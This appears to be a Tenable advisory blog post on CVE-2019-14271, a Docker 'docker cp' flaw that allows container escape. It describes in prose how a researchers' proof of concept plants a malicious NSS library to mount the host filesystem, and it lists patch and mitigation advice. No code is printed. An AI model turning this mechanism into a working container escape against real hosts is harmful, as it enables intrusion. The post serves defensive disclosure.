CVE-2019-14271：Proof of Concept for Docker Copy (docker cp) Vulnerability Released

Proof-of-concept (PoC) code for a security flaw in Docker, the popular containerization platform, is now public.

背景說明

On November 19, researchers at Unit 42, Palo Alto Networks’ research team, published their analysis of a severe vulnerability in the popular container deployment platform, Docker.

分析

CVE-2019-14271 is a critical code injection flaw in the Docker copy (docker cp) command, which is used to copy files between containers. Exploitation of this flaw can lead to full container escape by an attacker. It is important to note that to exploit this vulnerability, an attacker would need to include the exploit code in a malicious Docker container image or compromise a container either via another vulnerability or using previously leaked Docker secrets.

While the vulnerability was patched back in July 2019, researchers from Unit 42 published their analysis of the flaw on November 19. According to these researchers, the vulnerability exists in docker cp because a helper process (docker-tar) improperly loads specific libraries from the container file system rather than from the host file system. Specifically, docker-tar loads the Name Service Switch (NSS) libraries, identified by their filenames beginning with libnss. Targeting docker-tar presents an attacker with the necessary capability to gain full root access on the host file system.

To demonstrate exploitation of CVE-2019-14271, the researchers created their own version of an NSS library (libnss_files.so) and added a function called run_at_link(). The function performs a check to ensure it has been invoked by docker-tar first, followed by a step to replace the malicious libnss_files.so file with the legitimate one, because it is only intended to run once. Finally, the NSS library will request an executable that writes a message to a specified path (/evil) and mounts the host filesystem on the container at the /host_fs path. A video demonstration of this exploit can be found in the Palo Alto Networks blog.

概念驗證

In their blog, Unit 42 researchers included a PoC in the form of a malicious NSS library file, libnss_files.so.

解決方法

As mentioned previously, Docker patched this vulnerability back in July in Docker version 19.03.1. Docker users are encouraged to update as soon as possible.

If updating to a patched version is not feasible at this time, users are strongly encouraged to only use trusted Docker container images that have been verified and/or signed. Additionally, please consider using non-root users when launching containers, as that would mitigate the threat this vulnerability poses.

找出受影響的系統

A list of Tenable plugins to identify this vulnerability can be found here.

取得更多資訊

• Palo Alto Networks blog on CVE-2019-14271
• Release Notes from Docker for version 19.03.1
• Debian Security Tracker for CVE-2019-14271
• SUSE Advisory for CVE-2019-14271

加入 Tenable Community 的 Tenable 安全回應團隊。

深入瞭解 Tenable，這是用於全面管理新型攻擊破綻的首創 Cyber Exposure 平台。

Get a free 60-day trial of Tenable.io Vulnerability Management.